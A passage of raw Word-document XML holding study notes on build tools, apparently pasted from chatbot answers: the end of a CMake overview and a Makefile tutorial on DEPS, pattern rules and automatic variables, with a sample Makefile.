      <w:r w:rsidRPr="00EC3C14">
        <w:t>endif()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFD2269" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Custom Commands and Targets</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3C14">
        <w:t>: Use add_custom_command and add_custom_target to define custom build steps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291DF156" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>cmake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC025E3" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727A77C3" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:lastRenderedPageBreak/>
        <w:t>add_custom_command(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F516F3F" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t xml:space="preserve">    OUTPUT generated_file.cpp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5225A405" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t xml:space="preserve">    COMMAND python generate.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09122F62" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t xml:space="preserve">    DEPENDS input_data.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B074BB" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217AF144" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="67"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>External Projects</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3C14">
        <w:t>: CMake can include external projects using ExternalProject_Add for handling complex dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0486948D" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FD8657" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Modularization</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3C14">
        <w:t>: Break down complex CMakeLists.txt into smaller modules or include files using include().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E179C62" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC3C14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Modern CMake</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC3C14">
        <w:t>: Prefer modern target-based commands (target_include_directories, target_compile_definitions) instead of older global commands like include_directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD74133" w14:textId="77777777" w:rsidR="00EC3C14" w:rsidRPr="00EC3C14" w:rsidRDefault="00EC3C14" w:rsidP="00EC3C14">
      <w:r w:rsidRPr="00EC3C14">
        <w:t>This overview provides a foundational understanding of CMakeLists.txt and its syntax, which can be expanded depending on your project’s complexity and requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B22898E" w14:textId="77777777" w:rsidR="00D876D5" w:rsidRDefault="00D876D5" w:rsidP="00D876D5"/>
    <w:p w14:paraId="598BFED5" w14:textId="04A2A1F4" w:rsidR="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Makefile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053A2750" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29"/>
    <w:p w14:paraId="0AE0F173" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. DEPS Macro:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729B828B" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F29">
        <w:t xml:space="preserve">DEPS is a </w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>macro</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:t xml:space="preserve"> (or variable) that stores the </w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:t xml:space="preserve"> for the .c files, typically the .h (header) files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EC106C" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F29">
        <w:t>In a C program, .c files (source files) often depend on .h files (header files) for declarations, so they must be recompiled whenever the header files change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453ED7E0" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F29">
        <w:t>By listing the header files in DEPS, you ensure that if any header file changes, the corresponding .c file will be recompiled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EC81A5" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:r w:rsidRPr="004E1F29">
        <w:t>makefile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A36658B" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:r w:rsidRPr="004E1F29">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E24DBA" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:r w:rsidRPr="004E1F29">
        <w:t>DEPS = file1.h file2.h file3.h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCCB64D" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. .o File Rule (Object Files):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777AB117" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F29">
        <w:t xml:space="preserve">The .o files are </w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>object files</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:t xml:space="preserve"> (compiled but not yet linked), which are created from .c files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E8A8C8" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F29">
        <w:t xml:space="preserve">This rule applies to any file ending with .o, meaning it's a </w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>generic rule</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:t xml:space="preserve"> that works for all object files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509FCA03" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Rule Structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D15A843" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:r w:rsidRPr="004E1F29">
        <w:t>makefile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E4DDA4" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:r w:rsidRPr="004E1F29">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0117CB7A" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:r w:rsidRPr="004E1F29">
        <w:t>%.o: %.c $(DEPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E5B435" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:r w:rsidRPr="004E1F29">
        <w:t xml:space="preserve">    $(CC) -c -o $@ $&lt; $(CFLAGS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3F0129" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>%.o: %.c $(DEPS)</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:t>: This line specifies that to create an .o file (e.g., main.o), you need the corresponding .c file (e.g., main.c) and any header files defined in DEPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1C782B" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Key Parts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623AEC00" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$(CC)</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:t>: The macro that holds the compiler (usually gcc or clang).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097CA8CD" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-c</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:t>: Tells the compiler to generate an object file (.o) rather than a final executable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E646A10" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-o $@</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:t xml:space="preserve">: The -o flag tells the compiler where to put the output. The </w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$@</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>special macro</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:lastRenderedPageBreak/>
        <w:t>that stands for the target file, i.e., the .o file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D459405" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:t>: This is another special macro that represents the first dependency in the list. In this case, it's the .c file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314C641A" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$(CFLAGS)</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:t>: Compiler flags used for things like optimization or warnings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA8FC94" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Special Macros $@ and $^:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEEB061" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:r w:rsidRPr="004E1F29">
        <w:t>These macros simplify rules in Makefiles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F14152" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$@</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:t xml:space="preserve">: Represents the </w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:t xml:space="preserve"> file (left of the :), so in %.o: %.c, $@ is the .o file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C63B697" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="73"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$^</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:t xml:space="preserve">: Represents all of the </w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:t xml:space="preserve"> (right of the :), so it expands to both the .c file and the $(DEPS) files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3860837E" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:r w:rsidRPr="004E1F29">
        <w:t>This makes the rule more general, so it can handle multiple dependencies easily.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A13AEF" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Final Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695ECB92" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:r w:rsidRPr="004E1F29">
        <w:t>Here’s how the Makefile might look with these macros:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B49DB1" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:r w:rsidRPr="004E1F29">
        <w:t>makefile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50128097" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:r w:rsidRPr="004E1F29">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DC1345" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:r w:rsidRPr="004E1F29">
        <w:t>CC = gcc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DC25EB" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:r w:rsidRPr="004E1F29">
        <w:t>CFLAGS = -Wall -g  # Compiler flags for warnings and debugging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A778EC" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29"/>
    <w:p w14:paraId="18D6B354" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:r w:rsidRPr="004E1F29">
        <w:t>DEPS = file1.h file2.h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAA5CD4" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:r w:rsidRPr="004E1F29">
        <w:t>OBJ = main.o otherfile.o</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B81D83" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29"/>
    <w:p w14:paraId="43510507" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:r w:rsidRPr="004E1F29">
        <w:t>%.o: %.c $(DEPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163AC09A" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:r w:rsidRPr="004E1F29">
        <w:t xml:space="preserve">    $(CC) -c -o $@ $&lt; $(CFLAGS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FB8C5D" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29"/>
    <w:p w14:paraId="5B44C35F" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:r w:rsidRPr="004E1F29">
        <w:t>myprogram: $(OBJ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7807E974" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:r w:rsidRPr="004E1F29">
        <w:t xml:space="preserve">    $(CC) -o $@ $^ $(CFLAGS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6293EE17" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29"/>
    <w:p w14:paraId="6021D85F" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:r w:rsidRPr="004E1F29">
        <w:t>clean:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D76A38F" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:r w:rsidRPr="004E1F29">
        <w:t xml:space="preserve">    rm -f *.o myprogram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6D5FC5" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>myprogram: $(OBJ)</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:t>: This defines the target myprogram as depending on all object files ($(OBJ)).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFFD298" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>$(CC) -o $@ $^ $(CFLAGS)</w:t>
      </w:r>
      <w:r w:rsidRPr="004E1F29">
        <w:t>: This command compiles and links all object files into an executable named myprogram.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3EFCBD" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F29">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D72D19B" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F29">
        <w:t>DEPS stores the header file dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DFCCDA" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F29">
        <w:t>.o files are created from corresponding .c files and depend on headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC27AC0" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E1F29">
        <w:t>Special macros like $@ (target) and $&lt; (first dependency) make the Makefile more flexible and easier to maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEBCA08" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29">
      <w:r w:rsidRPr="004E1F29">
        <w:t>Let me know if you need further clarification or examples!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BB42A6" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRPr="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="004E1F29"/>
    <w:p w14:paraId="4D405B69" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="00D876D5"/>
    <w:p w14:paraId="40CB3BD8" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="00D876D5"/>
    <w:p w14:paraId="1CD73753" w14:textId="77777777" w:rsidR="004E1F29" w:rsidRDefault="004E1F29" w:rsidP="00D876D5"/>
